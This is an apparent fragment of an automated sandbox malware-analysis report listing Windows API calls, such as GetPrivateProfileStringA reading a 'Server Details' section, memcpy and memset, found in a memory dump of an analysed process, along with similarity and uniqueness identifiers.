                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044551F,34@,0000007F,?), ref: 004033BA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileString
                                                                                                                                                                                                                    • String ID: 34@$Server Details
                                                                                                                                                                                                                    • API String ID: 1096422788-1041202369
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3110682361-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3510742995-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%